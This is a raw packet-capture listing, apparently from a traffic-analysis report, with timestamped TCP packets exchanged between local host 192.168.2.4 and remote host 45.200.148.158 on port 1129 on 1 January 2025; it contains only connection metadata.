Jan 1, 2025 18:10:00.362273932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.362286091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.362308979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.362324953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.362350941 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.362396955 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.363161087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.363171101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.363187075 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.363203049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.363219023 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.363250971 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.364077091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.364089966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.364108086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.364142895 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.365010023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.365021944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.365042925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.365056038 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.365053892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.365073919 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.365077972 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.365114927 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.365972996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.365986109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.366000891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.366019011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.366039038 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.366072893 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.366925955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.366941929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.366957903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.366978884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.366988897 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.366993904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.367010117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.367038012 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.367068052 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.367898941 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.367912054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.367928982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.367958069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.367969036 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.368004084 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.368865013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.368876934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.368892908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.368910074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.368918896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.368935108 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.368979931 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.369837046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.369848013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.369865894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.369877100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.369895935 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.369930983 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.370804071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.370815992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.370832920 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.370846987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.370862961 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.370867968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.370892048 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.370915890 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.371767998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.371781111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.371797085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.371809959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.371824980 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.371857882 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.372567892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.372580051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.372597933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.372608900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.372625113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.372637987 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.372670889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.373378038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.373389959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.373409033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.373423100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.373436928 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.373461962 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.374172926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.374188900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.374198914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.374217033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.374228954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.374233961 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.374258041 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.374300957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.374972105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.374984026 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.375000954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.375015974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.375027895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.375037909 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.375071049 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.375767946 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.375786066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.375802040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.375813007 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.375819921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.375850916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.376568079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.376583099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.376599073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.376611948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.376626968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.376632929 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.376661062 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.376682043 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.377368927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.377384901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.377394915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.377413988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.377432108 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.377460003 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.378186941 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.378199100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.378218889 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.378233910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.378243923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.378252029 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.378266096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.378271103 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.378309965 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.379129887 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.379142046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.379158974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.379172087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.379182100 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.379189968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.379235029 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.380100965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.380115986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.380131960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.380145073 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.380151033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.380167007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.380170107 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.380179882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.380218029 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.380990028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.381005049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.381021023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.381035089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.381052017 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.381082058 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.444519997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.444613934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.444617987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.444721937 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.444792986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.444840908 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.444852114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.444864035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.444883108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.444907904 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.445512056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.445641994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.445708036 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.445852041 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.445863008 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.445882082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.445898056 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.445928097 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.446326971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.446337938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.446357965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.446384907 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.449084044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.449178934 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.449204922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.449215889 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.449260950 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.449444056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.449459076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.449806929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.449817896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.449835062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.449856997 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.450196981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.450208902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.450229883 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.450242996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.450249910 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.450274944 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.450778961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.450789928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.450808048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.450820923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.450828075 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.450836897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.450849056 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.450870037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.451375008 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.451386929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.451404095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.451416969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.451427937 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.451433897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.451443911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.451483965 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.451518059 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.452126026 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.452136993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.452155113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.452167988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.452174902 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.452183008 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.452199936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.452213049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.452219009 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.452240944 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.453059912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.453071117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.453093052 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.453103065 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.453107119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.453124046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.453135014 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.453138113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.453186035 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.453989029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.454000950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.454016924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.454034090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.454041004 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.454042912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.454062939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.454073906 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.454076052 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.454096079 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.454129934 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.454946995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.454958916 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.454976082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.454992056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.455003023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.455015898 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.455019951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.455034018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.455039024 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.455054045 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.455060005 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.455096960 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.455754042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.455904007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.455914021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.455959082 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.456051111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.456093073 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.456094980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.456110954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.456124067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.456140041 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.456166983 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.456195116 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.456651926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.456664085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.456681013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.456691980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.456710100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.456722975 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.456724882 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.456737995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.456746101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.456763029 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.457592964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.457603931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.457621098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.457631111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.457639933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.457654953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.457664967 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.457672119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.457703114 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.457746983 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.458548069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.458559036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.458575964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.458590984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.458606005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.458611012 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.458619118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.458637953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.458652973 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.458682060 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.459440947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.459453106 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.459471941 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.459487915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.459497929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.459512949 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.459517002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.459531069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.459566116 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.459598064 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.460381031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.460393906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.460411072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.460426092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.460438013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.460455894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.460465908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.460472107 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.460484982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.460510969 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.460541010 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.461288929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.502425909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.502495050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.502510071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.502556086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.502594948 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.502684116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.502780914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.502793074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.502810955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.502820015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.502829075 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.502856970 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.531326056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.531403065 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.531414032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.531596899 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.531687975 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.531698942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.531716108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.531729937 CET	1129	49730	45.200.148.158	192.168.2.4
